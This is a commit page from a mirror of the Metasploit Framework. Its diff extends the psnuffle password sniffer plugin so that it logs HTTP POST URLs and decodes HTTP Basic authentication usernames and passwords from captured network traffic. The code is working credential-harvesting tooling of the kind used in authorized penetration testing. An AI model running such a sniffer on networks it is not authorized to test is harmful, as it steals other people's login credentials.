infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10315, pSnuffle POST and basic auth

GSoC/Meterpreter_Web_Console
William Vu 2018-07-17 12:59:12 -05:00
parent 914501cce2 f93e4a24a9
commit d5f10a74c7
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 20 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
data/exploits/psnuffle/url.rb
View File

@ -1,22 +1,24 @@
# Psnuffle password sniffer add-on class for HTTP GET URL's # Psnuffle password sniffer add-on class for HTTP URLs
# part of psnuffle sniffer auxiliary module # part of psnuffle sniffer auxiliary module
#
# Very simple example how to write sniffer extensions
#
# Sniffer class for GET URL's #
# Sniffer class for GET/POST URLs.
# Also extracts HTTP Basic authentication credentials.
#
class SnifferURL < BaseProtocolParser class SnifferURL < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i, :get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i, :post => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST:\s+([^\n\r]+)/i,
:basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us # We want to return immediately if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80) return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k| self.sigs.each_key do |k|
@ -34,10 +36,16 @@ class SnifferURL < BaseProtocolParser
case matched case matched
when :webhost when :webhost
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
if(s[:get]) if s[:get]
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}") print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session]) end
return if s[:post]
print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")
end
if s[:basic_auth]
s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
report_auth_info s
print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
end end
when nil when nil
# No matches, no saved state # No matches, no saved state
@ -45,4 +53,3 @@ class SnifferURL < BaseProtocolParser
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end # end of URL sniffer end # end of URL sniffer